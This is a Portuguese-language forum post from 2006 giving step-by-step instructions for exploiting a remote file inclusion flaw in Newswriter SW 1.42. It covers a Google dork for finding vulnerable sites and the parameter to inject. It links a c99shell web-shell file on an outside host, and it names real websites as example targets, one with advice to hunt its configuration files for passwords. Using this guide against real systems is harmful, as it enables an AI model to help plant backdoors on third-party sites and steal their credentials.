Newswriter SW <= 1.42 (NWCONF_SYSTEM[server_path]) Remote File Inclusion Vulnera

Started by thorking, 29 de September , 2006, 12:14:18 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

thorking

29 de September , 2006, 12:14:18 AM
Newswriter SW <= 1.42 (NWCONF_SYSTEM[server_path]) Remote File Inclusion Vulnerability

http://www.milw0rm.com/exploits/2439


Primeiramente procure no google por inurl:/newswriter/  em seguida acrescente na url include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=     ficando
http://www.site-vul.com/newswriter/incl ... ONF_SYSTEM[server_path]= cmd

uma cmd que pode ser utilizada está no endereço:

http://dot.hazard.free.fr/hacking/explo ... 9shell.txt?


Site de exemplo:

http://www.sockenundwolle.de/newswriter ... ONF_SYSTEM[server_path]=http://dot.hazard.free.fr/hacking/exploits/Backdoor/c99shell.txt?


o site acima não está bugado pois está sem acesso de leitura e escrita mas serve de base se estiver bugado vai aparecer vários arquivos nesse site não aparece arquivo algum então se estiver bugado basta procurar onde fica a index.html ou index.php


já o site debaixo está maiôs ou menos bugado tem permição de leitura então basta procurar por arquivos de configurações pois geralmente no fonte tem passwd ou até mesmo arquivos de passwd

http://www.welz-kg.de/newswriter/includ ... 2F&sort=0a
Print
Go Up Pages1
User actions